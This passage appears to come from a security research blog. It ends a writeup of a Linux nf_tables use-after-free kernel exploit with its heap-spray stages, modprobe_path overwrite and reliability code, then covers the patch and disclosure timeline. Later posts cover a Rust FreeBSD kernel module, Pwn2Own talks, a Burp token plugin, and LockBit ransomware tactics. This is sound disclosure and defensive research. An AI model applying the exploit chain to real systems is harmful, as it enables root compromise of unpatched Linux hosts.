In order to get a shell, we chose to simply overwrite modprobe_path with a NULL-terminated path that fits within a 64-bit value, for example /tmp/a. From here, everything is straight forward. We just need a separate exploit worker process that won’t have been killed by the kernel oops to wait for the main exploit process to crash. And after detecting the crash, it can simply trigger modprobe and get a root shell.

Time Slice Scheduling (Context Conservation)

As a minor detour, it is worth discussing the reliability of the exploit

We are triggering a large number of UAF’s in the exploit (4). With each UAF, it is important to be able to reallocate the free’d chunk with an attacker controlled replacement before it is taken by other system usage. Generally, the more UAFs you have, the more chances that this problem occurs and thus it reduces the exploit stability and reliability.

@ky1ebot et al wrote a great paper called Playing for K(H)eaps: Understanding and Improving Linux Kernel Exploit Reliability which empirically evaluates some of the techniques used by exploit developers to gain a more concrete understanding of what helps or hinders exploit reliability when exploiting the Linux kernel.

One great new technique proposed out of this paper was the concept of “Context Conservation”. This technique proposes that by injecting a stub into a process to measure when a fresh time slice can be allocated, then it would be possible to reduce the likelihood of a context switch occurring and hence non-deterministic kernel heap state.

We implemented this technique in our exploit using similar code to the ts_fence example from KHeaps.

We also spent a bit of time reducing the amount of code between a free and allocation within userspace by using inline methods. As mentioned earlier we had to be careful about reducing any sort of unwanted debug output in between critical sections as well.

We also modified the netlink message sending and receiving wrappers we were using for a free and reallocation to occur in the same time slice.

An example of this is as follows:

inline int
send_batch_request_fast(struct mnl_socket * nl, uint16_t msg, uint16_t msg_flags, uint16_t family, void ** object, int * seq)
{
    char * buf = calloc(BUFFER_SIZE, 2);
    struct mnl_nlmsg_batch * batch = mnl_nlmsg_batch_start(buf, BUFFER_SIZE);

    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), (*seq)++);
    mnl_nlmsg_batch_next(batch);

    int obj_seq = *seq;

    send_batch_request_no_handling(nl, msg, msg_flags, family, object, seq, batch, true);
    // We don't check if mnl_socket_send() succeeded

    // NOTE: we leak buf[] and never free it but we want it fast
    // We also never stop the batch but won't use it anyway

    // We return this so the caller can read the netlink messages later when there is
    // no time pressure to avoid netlink desynchronisation
    return obj_seq;
}

Our send_batch_request_no_handling() contains the following if force_context is true:

   if (force_context) {
        // The idea is we want to be on the same time slice for what we trigger 
        // with the mnl_socket_sendto() call and additional stuff we do later. 
        // E.g. 
        // - triggering an object free in kernel with:
        //   stage1() -> vuln_trigger_with_lookup_expr() -> create_set() -> mnl_socket_sendto()
        // - and replace it with another object:
        //   stage1() -> "user_key_payload spraying"
        ts_fence();
    }

Using both of these techniques, as well as other careful ordering of operations and minimizing other noise, we managed to significantly improve the reliability of the exploit to the point where we would be successful with all UAF’s within generally one or two attempts, and have a system crash rate close to 0%.

Putting It Altogether

Just to revisit all the stages together, what we do is:

  • UAF1: Replace nft_dynset associated with SET1 with user_key_payload and leak SET1 address
    • SET1 will be adjacent to sprayed tty_struct
  • UAF2: Replace nft_dynset associated with SET2 with cgroup_fs_context and overwrite cgroup_fs_context->release_agent with SET2 address
  • UAF3: Destroy cgroup to free cgroup_fs_context, and thus SET2, and then replace with FAKESET1
    • Now, SET2 can be legitimately used to leak SET1 and adjacent memory
  • Leak address of FAKESET1/SET2 and bypass KASLR by reading SET1 and adjacent tty_struct objects
  • UAF4: Replace FAKESET1 with FAKESET2, with ops now pointing to valid ROP gadget
  • Trigger FAKESET2->ops->gc_init() to overwrite modprobe_path
  • Trigger modprobe and get root

Patch Analysis

In order to fix the vulnerability, the logic related to 1) initializing expressions first and 2) checking flags later, was changed:

This patch moved the check for stateful expressions prior to the creation, before an allocation could occur and preventing the early initialization of expressions which would be destroyed immediately but would have been able to perform operations prior (such as list binding).

This method is actually a lot better than our initial proposed solution in so far as that it completely destroys other potential vulnerabilities that come from early initialization of expressions that will be immediately destroyed at the same location.

It is worth noting that after finding the vulnerability we described in this blog post, we actually found a separate vulnerability related to expression initialization and we also planned to report it. However, this patch also effectively addresses the additional issue (and probably lots of others that we didn’t bother looking for), so we didn’t end up doing anything with this separate vulnerability.

Interestingly, @bienpnn, who successfully exploited Ubuntu at Pwn2Own Desktop, implied to us that he also exploited the same logic during the competition. We don’t yet know what underlying vulnerability they actually exploited though. If their bug had not been patched yet before ours, it is possible that the patch above also would have addressed their issue at the same time.

Conclusions

This was a really interesting vulnerability to exploit as the limitations forced us to get creative with how to build exploitation primitives. Due to the changes in recent kernel versions it also prevented the use of the widely popular msg_msg structures during exploitation. By living off the land, we found that abusing some of the existing nf_tables structures is also quite powerful.

Now that we have some more experience with this subsystem under our belt, we look forward to the next contest.

Exploit Glossary

This is a list of the terminology we use within this document to describe the exploit.

  • SET1: The first stable (as in persistent) set we use to trigger UAF1.
  • SET2: The second stable set we use to trigger UAF2. We also replace this set with FAKESET1 and later again with FAKESET2.
  • FAKESET1: A crafted data structure in a setxattr() allocated object that we use to replace SET2 after freeing the address of SET2+0x10.
  • FAKESET2: A crafted data structure in a setxattr() allocated object that we use to replace FAKESET1 (and thus SET2+0x10), after freeing the FAKESET1.
  • UAF1: The access/replacement of a SET1’s dynset expression structure that has already been freed, but has been replaced with a user_key_payload. This is possible due to the actual underlying vulnerability.
  • UAF2: The access/replacement of a SET2’s dynset expression structure that has already been freed, but has been replaced with a cgroup_fs_context. This is possible due to the actual underlying vulnerability.
  • UAF3: The access/replacement of SET2 after it has been freed by freeing the cgroup_fs_context associated with UAF2. In this case, SET2 will have been replaced with FAKESET1. This is a UAF that we create thanks to UAF2.
  • UAF4: The access/replacement of FAKESET1 after it has been freed and replaced by FAKESET2. This is still a UAF because it is SET2 chunk being replaced a second time after UAF3.

Also, we refer to the following structures/terms:

  • dynset expression: this is a struct nft_dynset*
  • legit expression: this is a struct nft_lookup*
  • tty: this is a struct tty_struct*
  • key: this is a struct user_key_payload*
  • cgroup: this is a struct cgroup_init_fs*
  • setxattr: this is not a real structure but instead is a void* data allocated when calling setxattr()

Disclosure Timeline

Date Notes
24/05/2022 Reported vulnerability to [email protected]
25/05/2022 Netfilter team produced fix patch and EDG reviewed
26/05/2022 Reported vulnerability to [email protected] with fix commit in net dev tree
26/05/2022 Patch landed in bpf tree
30/05/2022 Patch landed in Linus upstream tree
31/05/2022 Vulnerability reported to public oss-security as embargo period is over
31/05/2022 CVE-2022-32250 issued by Red Hat
02/06/2022 Duplicate CVE-2022-1966 issued by Red Hat
03/06/2022 Fix fails to apply cleanly to stable tree backports
03/06/2022 Ubuntu issued updates and advisory
10/06/2022 Fedora issued updates and advisory
11/06/2022 Debian issued updates and advisory
13/06/2022 Backported fixes applied to 5.4, 4.19, 4.14 and 4.9 kernels
28/06/2022 Red Hat Enterprise Linux issued updates and advisories

Extra Reading

Right after presenting this research at HITB 2022 in Singapore, a great blogpost was released by Theori describing a different way of exploiting this same vulnerability. This is a really interesting opportunity for you to read about how different exploit developers will approach the same set of problems.

Slides for the presentations we gave at Hitcon 2022 and HITB 2022 Singapore are already available online here and here.

It is worth mentioning that, after we wrote an exploit for this vulnerability, someone else also published and patched yet another vulnerability that we had found but not tried to exploit, which is also related to nft_set. This blog has a nice explanation of some of these set properties:

And further to that, there’s been even more netfilter related exploit/bugs since:

Writing FreeBSD Kernel Modules in Rust

31 August 2022 at 14:51

At present all major operating system kernels are written in C/C++, languages which provide no or minimal assistance in avoiding common security problems. Modern languages such as Rust provide better security guarantees by default and prevent many of the common classes of memory safety security bugs. In this post we will take a brief look at existing community efforts towards this goal and build a basic “Hello World” proof-of-concept kernel module for FreeBSD.

It is generally accepted that a large proportion of security issues in complex software stem from memory safety problems. A well-known blog post from Microsoft attributes approximately 70% of vulnerabilities in their products to memory safety issues. And the 70% figure comes up again from Chromium’s research into the root causes of high and critical severity security bugs in their browser engine.

Enter Rust.

Rust is a programming language empowering everyone to build reliable and efficient software. It achieves this goal primarily by bringing as much error-checking and validation as possible forward to compilation time. Additionally, for operations that may fail due to external factors, its robust mechanisms for handling runtime errors ensure that applications won’t enter unexpected states.

As an example of the type of support that Rust provides, consider memory management. In “traditional” languages, it is expected that the programmer will correctly handle all aspects of the memory management lifecycle:

  • Ensure that the size of an allocation requested from malloc is correct, accounting for, e.g. off-by-one errors from mishandling the null byte at the end of a string
  • Ensure that the allocation was successful – not usually a concern in userspace code, however kernel and embedded code should safely handle allocation failures
  • For library functions, in the absence of a compiler-enforced contract around memory ownership, ensure that memory management obligations are clearly documented and implemented accordingly to avoid use-after-free or double-free issues
  • If two threads are accessing a shared area of memory, ensure that they do not try to write to it at the same time and that any read-modify-write sequences are consistent
  • Ensure that all allocations are freed at most once
  • After an allocation has been freed, ensure that the no function attempts to use the freed memory

Rust prevents these bug types at compile time by strictly tracking memory ownership and lifetimes automatically. For example, if a function accepts a reference to an object then that object will not be freed until after that function has returned – preventing use-after-free vulnerabilities. Similarly, if a function takes ownership of an object then only that function will be able to free it and it is no longer available to the calling context – preventing double-free vulnerabilities.

In addition, safe Rust prevents out-of-bounds memory accesses at runtime, either by panicking or with methods that return Option::None when given an out-of-bounds index.

#![no_std] and GlobalAlloc

When developing for embedded systems or kernels we can’t generally rely on the system giving us access to a heap memory allocator – often because embedded systems typically have limited memory capacity don’t generally have separate heap space.

To account for this, the Rust standard library is split into two components: core and alloc. The core crate contains all the standard library functions that don’t rely on an allocator, and alloc provides functions that do rely on heap memory.

By default, the standard library uses the operating system’s default allocator (e.g. glibc malloc(3)). After telling the compiler that we don’t want to use Rust’s standard library (by putting in the #![no_std] annotation) we may indicate that we wish to use a specific allocator – this is where the GlobalAlloc trait comes in.

In order to use alloc, we must provide a implementation of GlobalAlloc and register it with the #[global_allocator] attribute. For example, on an embedded system we may wish to write a custom allocator to hand out sections of an SRAM chip, or in an operating system we may need to allow programs to requests blocks of memory. For kernel modules, the Linux and BSD kernels provide us with allocators to use (e.g. kmalloc), so our implementation can be a relatively simple wrapper around these system library calls.

For example, we use the following code to tell Rust how to use the FreeBSD kernel’s memory allocator (where kernel_sys is a wrapper library around the kernel headers):

use core::alloc::{GlobalAlloc, Layout};

pub struct KernelAllocator;

unsafe impl GlobalAlloc for KernelAllocator {
    unsafe fn alloc(&self, layout: Layout) -> *mut u8 {
        kernel_sys::malloc(
            layout.size(),
            &mut kernel_sys::M_DEVBUF[0],
            kernel_sys::M_WAITOK,
        ) as *mut u8
    }

    unsafe fn dealloc(&self, ptr: *mut u8, _layout: Layout) {
        kernel_sys::free(
            ptr as *mut libc::c_void,
            &mut kernel_sys::M_DEVBUF[0],
        );
    }
}

Implementors of GlobalAlloc must provide an alloc_error_handler function which is called on allocation failure, and is usually used to halt or reboot the system or panic (note that the return type for this function is ! – the Never type – indicating that this function will never return.

This isn’t always useful behaviour, and the ability to handle allocation failures is important in several contexts (e.g. kernels, embedded, garbage-collected runtimes, database engines). There has been a lot of work towards support for fallible allocations, now collected in the allocators working group, and several types have experimental try_reserve methods that return an error on allocation failure instead of calling the gloabl error handler.

Features and Nightly Rust

What is “Nightly Rust” all about? This section intends to provide a brief background on the Rust compiler development process, why it’s sometimes necessary to use the Nightly compiler and why that can cause us problems.

One of the core goals of Rust is to be fully backwards compatible, in the sense that if a codebase compiles with a stable version of the compiler then it is also guaranteed to compile with all future versions (unless a particular piece of code only compiled as a result of a compiler bug). This is achieved by rigorously testing new features before they get accepted into the stable compiler or standard library. Consequently, we have the Stable compiler branch for production use, and the Nightly branch for experimenting with new features.

One of the advantages of this system is that it’s easy to write code that uses new and exciting features, however there is a risk that these features might get removed or considerably changed between Nightly releases and there isn’t the support guarantee that Stable provides. Unfortunately, a number of the features required for low-level development are still in this experimental phase – our BSD module uses both the alloc_error_handler and default_alloc_error_handler features because the allocation error handling behaviour is still in development. Ultimately, this means that our code is not guaranteed to compile on future Rust releases (indeed part of the motivation for this project was to update an example from 2017 which no longer compiles).

Linux

Over the last couple of years there has been significant effort put into developing a framework for building Linux kernel modules with Rust. This started with the fishinabarrel project and is now progressing on a dedicated fork of Linux with first-class support for Rust as a language for kernel development.

The project currently uses a recent stable version of Rust – 1.62. This is possible, despite the need for fallible allocation, because it includes a customised version of Rust’s alloc crate. The customised version can be modified more readily than the version bundled with Rust and has allowed the Rust for Linux team to mark the necessary methods as stable.

The patches have been submitted to the Linux maintainers for consideration, and Linus Torvalds has recently suggested that they are very close to getting merged – possibly in time for the upcoming 6.0 release.

Further information can be found in the Rust for Linux documentation and in the recent Linux Foundation webinar delivered by Wedson Almeida Filho.

The Rust interface is fairly straightforward, even to someone new to kernel development. A minimal example consists of the following:

// SPDX-License-Identifier: GPL-2.0
//! Rust minimal sample.
use kernel::prelude::*;

module! {
    type: RustMinimal,
    name: b"rust_minimal",
    author: b"Rust for Linux Contributors",
    description: b"Rust minimal sample",
    license: b"GPL",
}

struct RustMinimal {
    message: String,
}

impl kernel::Module for RustMinimal {
    fn init(_name: &'static CStr, _module: &'static ThisModule) -> Result<Self> {
        pr_info!("Rust minimal sample (init)\n");
        pr_info!("Am I built-in? {}\n", !cfg!(MODULE));

        Ok(RustMinimal {
            message: "on the heap!".try_to_owned()?,
        })
    }
}

impl Drop for RustMinimal {
    fn drop(&mut self) {
        pr_info!("My message is {}\n", self.message);
        pr_info!("Rust minimal sample (exit)\n");
    }
}

The low-level code to interface with the kernel APIs is generated with bindgen. To provide a somewhat friendlier interface, higher-level wrappers have been written which abstract away the direct calls into C functions.

The above example demonstrates some of these higher-level features. The module! macro generates the necessary code for registering a module with the kernel, and the kernel::Module trait defines the signature of the init method that a type must implement in order to be loaded as a kernel module.

Further examples can be found in the Rust for Linux project’s samples directory and the Rust interface documentation can be viewed on the rust-for-linux docs site. Instructions for building out-of-tree modules are also available.

FreeBSD

For FreeBSD, there doesn’t seem to be any active work in this space, with the main prior works being Johannes Lundberg’s example and Master’s Thesis from 2017/18 and some follow-up work by Anatol Ulrich. As the Rust language has evolved since Lundberg’s early work a bit of effort is required to bring the up to date and ready to compile on recent compilers.

As a proof of concept, we produced fresh bindings to the FreeBSD kernel headers with bindgen and separated out the echo code into a safe wrapper crate around the bindings and the driver itself. There’s too much code to reasonably include directly in this blog post, so the complete source can be found on GitHub. The kernel-sys crate contains the bindings to the kernel headers (kernel-sys/wrapper.h) we need for building modules, bsd-kernel contains the safe abstraction layer, and module-hello contains the example module.

The abstractions used here are not as advanced as those available for Linux kernel modules, so the process involves building a Rust library that exports the relevant symbols and then statically linking it to a C program (hello.c) that calls the module initialisation function.

Module interface

There are two main jobs a kernel module always has to be able to do:

  • Declare itself; and
  • Handle events.

In this example we only consider the second of these – the first is handled by a C wrapper.

There are four module events, which we represent in bsd-kernel/src/module.rs with an enum:

/// The module event types
#[derive(Copy, Clone, Debug, Eq, PartialEq)]
#[repr(u32)]
pub enum ModuleEventType {
    /// Module is being loaded
    Load = modeventtype_MOD_LOAD,
    /// Module is being unloaded
    Unload = modeventtype_MOD_UNLOAD,
    /// The system is shutting down
    Shutdown = modeventtype_MOD_SHUTDOWN,
    /// The module is about to be unloaded - returning an error from the
    /// QUIESCE event causes kldunload to cancel the unload (unless forced
    /// with -f)
    Quiesce = modeventtype_MOD_QUIESCE,
}

impl TryFrom<i32> for ModuleEventType {
    type Error = Error;
    fn try_from(input: i32) -> Result<Self, Self::Error> {
        use ModuleEventType::*;
        #[allow(non_upper_case_globals)]
        match input.try_into()? {
            modeventtype_MOD_LOAD => Ok(Load),
            modeventtype_MOD_UNLOAD => Ok(Unload),
            modeventtype_MOD_SHUTDOWN => Ok(Shutdown),
            modeventtype_MOD_QUIESCE => Ok(Quiesce),
            _ => Err(Error::ConversionError("Invalid value for modeventtype")),
        }
    }
}

For our module, we expose a C ABI-compatible function module_event to handle these events:

#[no_mangle]
pub extern "C" fn module_event(
    _module: bsd_kernel::Module,
    event: c_int,
    _arg: *mut c_void,
) -> c_int {
    if let Some(ev) = ModuleEventType::from_i32(event) {
        use ModuleEventType::*;
        match ev {
            Load => { /* ... */ }
            Unload => { /* ... */ }
            Quiesce => { /* ... */ }
            Shutdown => { /* ... */ }
        }
    } else {
        debugln!("[interface.rs] Undefined event");
    }
    0
}

The wrapper simply declares the existence of our module, and registers it with the kernel:

#include <sys/param.h>
#include <sys/module.h>
#include <sys/kernel.h>
#include <sys/systm.h>
#include <sys/types.h>
#include <sys/conf.h>
#include <sys/uio.h>
#include <sys/malloc.h>

extern int module_event(struct module *, int, void *);

static moduledata_t module_data = {
    "hello",        /* module name */
     module_event,  /* event handler */
     NULL           /* extra data */
};

DECLARE_MODULE(hello, module_data, SI_SUB_DRIVERS, SI_ORDER_MIDDLE);

Device interface

A simple type of kernel module is a character device. This is a device which behaves a bit like a regular file – supporting open, close, read and write operations that pass bytes in or out. To represent this we define a CharacterDevice trait with methods corresponding to the actions that the device should be able to perform:

pub trait CharacterDevice {
    fn open(&mut self);
    fn close(&mut self);
    fn read(&mut self, uio: &mut UioWriter);
    fn write(&mut self, uio: &mut UioReader);
}

The interface code in src/character_device.rs provides a wrapper type CDev that protects our device behind a mutex and stores a pointer to the character device structure that the kernel gives us via make_dev:

pub struct CDev<T>
where
    T: CharacterDevice,
{
    _cdev: ptr::NonNull<kernel_sys::cdev>,
    delegate: SharedModule<T>,
}

Creating a character device requires us to give the kernel a function pointer for each operation we wish to support – in this case open, close, read, and write. To do this, we create C-ABI functions for a generic CharacterDevice – from these the compiler will produce a concrete set of functions for each device we create.

The SharedModule<T> struct internally uses a mutex to protect concurrent access to the module’s data. The wrapper functions must then lock this mutex before they can call the device methods.

For example, the close wrapper looks like this:

extern "C" fn cdev_close<T>(
    dev: *mut kernel_sys::cdev,
    _fflag: c_int,
    _devtype: c_int,
    _td: *mut kernel_sys::thread,
) -> c_int
where
    T: CharacterDevice,
{
    let cdev: &CDev<T> = unsafe { &*((*dev).si_drv1 as *const CDev<T>) };
    if let Some(mut m) = cdev.delegate.lock() {
        m.close();
    }
    0
}

The module initialisation code creates concrete implementations of these wrappers specific to the CharacterDevice we provide and stores their addresses in a kernel_sys::cdevsw struct to pass to the kernel:

impl<T> CDev<T>
where
    T: CharacterDevice,
{
    pub fn new_with_delegate(
        name: &'static str,
        delegate: SharedModule<T>,
    ) -> Option<Box<Self>> {
        let cdevsw_raw: *mut kernel_sys::cdevsw = {
            let mut c: kernel_sys::cdevsw = unsafe { mem::zeroed() };
            c.d_open = Some(cdev_open::<T>);
            c.d_close = Some(cdev_close::<T>);
            c.d_read = Some(cdev_read::<T>);
            c.d_write = Some(cdev_write::<T>);
            c.d_version = kernel_sys::D_VERSION as i32;
            c.d_name = "helloworld".as_ptr() as *mut i8;
            Box::into_raw(Box::new(c))
        };
        ...
    }
}

Implementing a Character Device

To implement a character device, all that’s left is to create a struct and implement the CharacterDevice trait on it:

lazy_static! {
    /// static instance of `SharedModule<Hello>` that is automatically
    /// initialised on first use. This allows the module initialisation
    /// code to obtain separate handles to the same data
    pub static ref MODULE:
        SharedModule<Hello> = SharedModule::new(Hello::new());
}

#[derive(Debug)]
pub struct HelloInner {
    data: String,
    _cdev: Box<CDev<Hello>>,
}

#[derive(Default, Debug)]
pub struct Hello {
    inner: Option<HelloInner>,
}
impl Hello {
    fn new() -> Self {
        Hello::default()
    }
}

impl ModuleEvents for Hello {
    fn load(&mut self) {
        debugln!("[module.rs] Hello::load");

        // Obtain a handle to the `Hello` module
        let m = MODULE.clone();

        if let Some(cdev) = CDev::new_with_delegate("rustmodule", m) {
            self.inner = Some(HelloInner {
                data: "Default hello message\n".to_string(),
                _cdev: cdev,
            });
        } else {
            debugln!(
                "[module.rs] Hello::load: Failed to create character device"
            );
        }
    }

    fn unload(&mut self) {
        debugln!("[module.rs] Hello::unload");
    }
}


impl CharacterDevice for Hello {
    fn open(&mut self) {
        debugln!("[module.rs] Hello::open");
    }
    fn close(&mut self) {
        debugln!("[module.rs] Hello::close");
    }
    fn read(&mut self, uio: &mut UioWriter) {
        debugln!("[module.rs] Hello::read");

        if let Some(ref h) = self.inner {
            match uio.write_all(&h.data.as_bytes()) {
                Ok(()) => (),
                Err(e) => debugln!("{}", e),
            }
        }
    }
    fn write(&mut self, uio: &mut UioReader) {
        debugln!("[module.rs] Hello::write");
        if let Some(ref mut inner) = self.inner {
            inner.data.clear();
            match uio.read_to_string(&mut inner.data) {
                Ok(x) => {
                    debugln!(
                        "Read {} bytes. Setting new message to `{}`",
                        x,
                        inner.data
                    )
                }
                Err(e) => debugln!("{:?}", e),
            }
        }
    }
}

This device manages a String buffer, storing user-supplied data when written to and returning it when read.

The module can then be compiled and loaded as follows:

./build.sh
sudo make load
echo "hi rust" > /dev/rustmodule
cat /dev/rustmodule
sudo make unload

Conclusion

In this post we’ve shown that it is possible to write a simple kernel module for FreeBSD in Rust. More complete integration of Rust into existing operating system kernels is going to take a lot more time and effort, but on Linux these efforts are progressing quickly and it’s surely only a matter of time before other operating systems start to give low-level Rust serious consideration. The loadable kernel module interface is a good starting point for this work because it’s relatively isolated from the core kernel code and is on the boundary where external actors may interact with the kernel. Rust’s safety guarantees are an excellent match for this security boundary.

In the future we may start to see experimental rewrites of core kernel components into Rust, bringing stronger security guarantees to the networking layers or filesystem operations.

Some further topics which may help progress towards Rust in operating system kernels are the following:

  • Build a larger set of abstractions to mirror the Rust for Linux efforts on FreeBSD
  • Improve the abstractions used here to make them less leaky (i.e. remove the requirement to store a CDev object in the struct implementing CharacterDevice)
  • A similar exercise for Illumos
  • Design a set of abstractions for common behaviour between Linux, BSD, and Illumos (or demonstrate that this activity is impossible, or possible but only for a limited set of functionality)
  • Implement something useful, e.g. a driver for an SPI device or an interface layer onto embedded-hal traits

  • Full source code for this kernel module, including bindings to the FreeBSD kernel headers, is available on GitHub.

NCC Con Europe 2022 – Pwn2Own Austin Presentations

30 August 2022 at 10:22

Cedric Halbronn, Aaron Adams, Alex Plaskett and Catalin Visinescu presented two talks at NCC Con Europe 2022. NCC Con is NCC Group’s annual private internal conference for employees. We have decided to publish these 2 internal presentations as it is expected that the wider security community could benefit from understanding both the approach and methodology which is used when performing vulnerability research for the competition.

The abstracts for these talks were as follows (download links below).

Pwn2Own Austin 2021 – How to win $$$ at a hacking contest?

Abstract: In Nov 2021, NCC Group participated to the Pwn2Own hacking contest for the first time and demonstrated exploit development capabilities against 2 targets: a NAS and a printer. This talk is more about the journey than the actual result. We will explain the decisions we made over time, which ones ended up being partial failures, and which ones led to success.

Description:

The presentation is divided into the following parts:

  1. Initial target choice: we present the Pwn2Own hacking contest rules, the possible targets and how we chose 3 targets
  2. Vulnerability research and exploit development: we explain how we split work between 4 people, the different attempts, failure, achievements. We detail the tools we developed, the debug environments we setup, the hardware attacks we decided to go through to improve debug capabilities. We go over the bugs we found that were not promising and the ones we ended up choosing for exploitation (but without going into technical details since this is proposed as a 2nd talk: “Pwn2Own hacking contest: details of 3 bugs we found and exploited”)
  3. Pwn2Own contest event: we explain how we experienced the contest, what problems we had to deal with to get the exploits to work in the allocated time, and our experience with the contest organizers/vendors post-demonstration.
  4. What to learn from it: We propose some methodology when participating to Pwn2Own and we give insights on what to do better next year to maximize our efforts and exploit even more devices.

Pwn2Own Austin 2021 – Remotely Exploiting 3 Embedded Devices

Abstract: In 2021, NCC Group decided to participate to the Pwn2Own hacking contest and invested some vulnerability research time against 3 targets: a router, a NAS and a printer. This talk is about the resulting exploits’ internals and how we managed to get pre-authentication remote code execution on all 3 devices.

Description:

The talk consists of the following key parts:

  1. The first part of the talk will focus on the Netgear R6700, we will perform an overview of the attack surface, vulnerable areas and describe a stack based buffer overflow which was identified and exploited to remotely compromise the router over a LAN connection.
  2. The second part of the talk will focus on the Western Digital PR4100 NAS chain. We will describe the attack surface, a file format parsing vulnerability and exploit used to remotely compromise the NAS over a LAN connection.
  3. Finally we will describe the tech details of hardware attacks on the Lexmark printer to enable unencrypted firmware dumping and visibility into the internals of the platform. We will describe how we went from zero knowledge of the Lexmark printer environment to achieving a root shell on the device. We will describe a vulnerability identified within the Printer Job Description (PJL) handling code and how this could be exploited to achieve arbitrary file write. We will then describe how this was exploited to obtain a shell.
  4. In conclusion we will highlight areas which the device vendors did well and made it more challenging to develop attacks on the platform together with suggesting improvements which device vendors could make to enhance the security posture of their devices in future.

Tool Release – JWT-Reauth

25 August 2022 at 16:20

[Editor’s note: This post is a part of our blog series from our NCC Group summer interns! You can see more posts from consultants in our internship program here.]

When testing APIs with short-lived authentication tokens, it can be frustrating to login every few minutes, taking up a consultant’s time with an unnecessary cut+paste task As well as introducing the possibility for human error in copying across the token, which can further hinder testing.

Today we are releasing JWT-Reauth, a plugin aims to provide a painless solution to this issue. JWT-Reauth provides Burp with a way to authenticate with a given endpoint, parse out the provided token and then attach it as a header on requests going to a given scope.

The latest version of the plugin can be downloaded as a JAR file from the releases page on GitHub: https://github.com/nccgroup/jwt-reauth/releases/

Feature List:

  • Caches authentication tokens
  • Regex parsing for the token format
  • Custom authentication header via the UI
  • Functionality accessible via the send-to-extension context menu:
    • Setting the authentication request
    • Parsing a token from a specific request
    • Adding a URL to the scope
  • Adjustable token refresh time
  • Entire plugin can be configured then enabled to start attaching the header

Example Usage:

This example will cover creating an authentication request in Postman, proxying it through Burp and adding that request to the plugin to be handled automatically.

Initially I like to setup my Burp proxy listening on 8081 as personal preference. I can then set Postman to proxy through Burp from the settings tab:

Once everything is going through Burp, we create an authentication request in Postman:

Once you have a working request for getting an access token, you can go to Burp’s target tab, find the site and use the context menu to send it to the plugin as an auth request. Note: requests from the proxy history also have this context menu.

While we’re in the target tab, it would be nice to add the request to JWT-Reauth’s own scope, so we do that using the “Send to JWT-Reauth (add to scope)” option in the context menu:

This will then appear in the JWT-Reauth’s own scope tab. I have also enabled the “Prefix” mode, meaning it will match any request whose URL has this as a prefix. This is useful for just including an entire site / subdirectory in the scope.

If we now navigate to the main plugin tab we will see the following:

JWT-Reauth has successfully used the authentication request to send a request of its own and parse the token out. To enable the substitution for proxied requests, we toggle the ‘not listening’ button to ‘listening’. If we now navigate to an in-scope URL we can see that the Authorization header is added:

Finally navigating back to the plugin we can see that it has cached the Authorization header for later use:

Alternative Uses

JWT-Reauth is also useful when using cURL, as it helps to avoid having to embed and update long token credentials in the commands.
The example cURL command below sends an authentication request through Burp using the –proxy option, enabling JWT-Reauth to reuse the request.

curl --request POST \
     --proxy 127.0.0.1:8081 \
     192.168.151.145:8080/auth_needs_post_data.php \
     --data "password=Password123"
{"access_token":"rVgzEQ9pAMU2vaDe5JBJtF3EhX9cVlhc0XGtUeElkGqSjsy7fC2XnHrS23vdULA41XlSY8McclN5dDXyO8Qh5yQv40RS3+2QDHrHVqqtT5mj4h261i\/WJQ89hn87V1im3AiubBsc4n8jTVa5qZq5tmXw9GXqaCx8jqkq21+UvqaGYInFrQA3sc8GLRfTVAHa+benVnZOGfqp\/ur6hOb79S4wTfoL8VoDT5OL+mkkIVxRebgEk6Cv+HkI5Uix7KgMA+MEH1IMfbdTPtVlHG1BOwuxrXmi1X00NRXXwwGfR6YCfwS9pXCLeegBj9M3dd+tEFyU4IROtk31Z48r4TfTpc3N70hcUKWvuzciNToIaTtN8qx78KSP9gGxgkzLHqlIjlHMSa6XZPrYkwN9"}

After JWT-Reauth has been configured, we can keep using cURL’s –proxy option instead of having to pass in the entire authentication header, and JWT-Reauth will handle the rest.

curl --request GET \
     --proxy 127.0.0.1:8081 \
     192.168.151.145:8080/
array (
  'Host' =>; '192.168.151.145:8080',
  'User-Agent' => 'curl/7.79.1',
  'Accept' => '*/*',
  'Connection' => 'close',
  'Authorization' => 'Bearer +7mXfg4WkDyu8ajEyZQCOPgDaH4N4UQgNF0puZzmEnwJI8pPKuJlL/AtWrUQqyPYXDKme4iFrFAq0woonGHrhcXh/cdeLK5G3GCmj6mj7pSn7dPJ+JqGugLouCgYAeLsN+E/88zPnPaIIls38tgUQ9sQxbFjb/nYcvRqFkJigQqwpXRcriGv1VKDT/fU8iCeoGbrlpJSl2hy7C+ReeZYQi1WMrBulCCzxyhGq0rVwQ1Ix1zxwt/wgN3DuXT7N6USiuZFMHWfzBvOj/Eo095zQ7sU4byMJB/YLFfxjzMOfaHmhHFWH4hoI9hOOEkJdXT/IUtRatWomya2F3ydWRd0vnNgrw1ZKh64ebWKxz+I2mUctXxmgQIE+gUqOnn5Y40azYt2V9P7g9rPeW89',
)

Summary

Overall I hope this plugin can be useful and save people some hassle. If you have any ideas for how to improve the plugin / features you would like to see, Issues and Pull Requests over on GitHub are very much appreciated!
https://github.com/nccgroup/jwt-reauth/issues

Back in Black: Unlocking a LockBit 3.0 Ransomware Attack 

Authored by: Ross Inman (@rdi_x64)

Summary

tl;dr

This post explores some of the TTPs employed by a threat actor who were observed deploying LockBit 3.0 ransomware during an incident response engagement.

Below provides a summary of findings which are presented in this blog post:

  • Initial access via SocGholish.
  • Establishing persistence to run Cobalt Strike beacon.
  • Disabling of Windows Defender and Sophos.
  • Use of information gathering tools such as Bloodhound and Seatbelt.
  • Lateral movement leveraging RDP and Cobalt Strike.
  • Use of 7zip to collect data for exfiltration.
  • Cobalt Strike use for Command and Control. 
  • Exfiltration of data to Mega.
  • Use of PsExec to push out ransomware.

LockBit 3.0

LockBit 3.0 aka “LockBit Black”, noted in June of this year has coincided with a large increase of victims being published to the LockBit leak site, indicating that the past few months has heralded a period of intense activity for the LockBit collective.

In the wake of the apparent implosion of previous prolific ransomware group CONTI [1], it seems that the LockBit operators are looking to fill the void; presenting a continued risk of encryption and data exfiltration to organizations around the world.

TTPs

Initial Access

Initial access into the network was gained via a download of a malware-laced zip file containing SocGholish. Once executed, the download of a Cobalt Strike beacon was initiated which was created in the folder C:\ProgramData\VGAuthService with the filename VGAuthService.dll. Along with this, the Windows command-line utility rundll32.exe is copied to the folder and renamed to VGAuthService.exe and used to execute the Cobalt Strike DLL.

PowerShell commands were also executed by the SocGholish malware to gather system and domain information:

